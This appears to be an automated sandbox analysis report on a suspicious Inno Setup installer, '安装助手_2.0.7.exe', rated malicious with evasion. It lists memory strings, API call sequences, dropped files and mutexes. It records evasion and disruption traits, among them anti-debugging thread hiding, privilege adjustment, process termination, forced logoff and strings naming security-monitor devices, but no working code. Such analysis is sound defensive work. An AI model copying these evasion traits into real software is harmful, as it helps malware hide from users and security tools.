Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .j)q
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD03F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CD03F30
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB83886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CB83886
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB83C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CB83C62
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB83D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CB83D18
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB83D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CB83D62
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB839CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CB839CF
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB83A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CB83A6A
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD04B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CD04B80
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB81950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6CB81950
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB84754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6CB84754
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CB847546_2_6CB84754
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD058636_2_6CD05863
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD009006_2_6CD00900
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD64CE06_2_6CD64CE0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDB1D506_2_6CDB1D50
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD50EC96_2_6CD50EC9
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDB7E806_2_6CDB7E80
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD36EA16_2_6CD36EA1
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDAC8106_2_6CDAC810
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDB79F06_2_6CDB79F0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD369726_2_6CD36972
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDC89306_2_6CDC8930
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDABAD06_2_6CDABAD0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDAFAA06_2_6CDAFAA0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDC2AA06_2_6CDC2AA0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDADA506_2_6CDADA50
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD3EBCA6_2_6CD3EBCA
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD4EB666_2_6CD4EB66
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD5340A6_2_6CD5340A
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDBD5C06_2_6CDBD5C0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDB05806_2_6CDB0580
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDB76E06_2_6CDB76E0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD3A7CF6_2_6CD3A7CF
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDD77006_2_6CDD7700
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDAE0206_2_6CDAE020
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CDC17506_2_6CDC1750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005E81EC10_2_005E81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005BE00A10_2_005BE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006281C010_2_006281C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063824010_2_00638240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006222E010_2_006222E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0064230010_2_00642300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063C3C010_2_0063C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006304C810_2_006304C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0060E49F10_2_0060E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006225F010_2_006225F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061865010_2_00618650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006166D010_2_006166D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061A6A010_2_0061A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005F094310_2_005F0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061C95010_2_0061C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063E99010_2_0063E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00622A8010_2_00622A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005FAB1110_2_005FAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00618C2010_2_00618C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00626CE010_2_00626CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00630E0010_2_00630E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00634EA010_2_00634EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006010AC10_2_006010AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0062D08910_2_0062D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0060B12110_2_0060B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063112010_2_00631120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006391C010_2_006391C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061D1D010_2_0061D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061B18010_2_0061B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0062518010_2_00625180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063720010_2_00637200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063D2C010_2_0063D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006053F310_2_006053F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A53CF10_2_005A53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063F3C010_2_0063F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005CB3E410_2_005CB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0062F3A010_2_0062F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063D47010_2_0063D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0062F42010_2_0062F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061741010_2_00617410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006354D010_2_006354D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005ED49610_2_005ED496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A157210_2_005A1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063155010_2_00631550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063353010_2_00633530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061F50010_2_0061F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0064351A10_2_0064351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063F59910_2_0063F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005F965210_2_005F9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0064360110_2_00643601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0062D6A010_2_0062D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005B976610_2_005B9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A97CA10_2_005A97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006377C010_2_006377C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005CF8E010_2_005CF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061F91010_2_0061F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0063D9E010_2_0063D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005BBAC910_2_005BBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00627AF010_2_00627AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005F3AEF10_2_005F3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A1AA110_2_005A1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00627C5010_2_00627C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005BBC9210_2_005BBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0061FDF010_2_0061FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00625E8010_2_00625E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00625F8010_2_00625F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: String function: 6CDD4F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: String function: 6CD37240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0063FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 005A1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 005A28E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007F2EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000000.1714612417.00000000002F9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.000000000370E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal88.evad.winEXE@141/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD04B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CD04B80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_005A9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005B3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_005B3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005A9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_005A9252
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 6_2_6CD04050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6CD04050
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\is-8QQJB.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
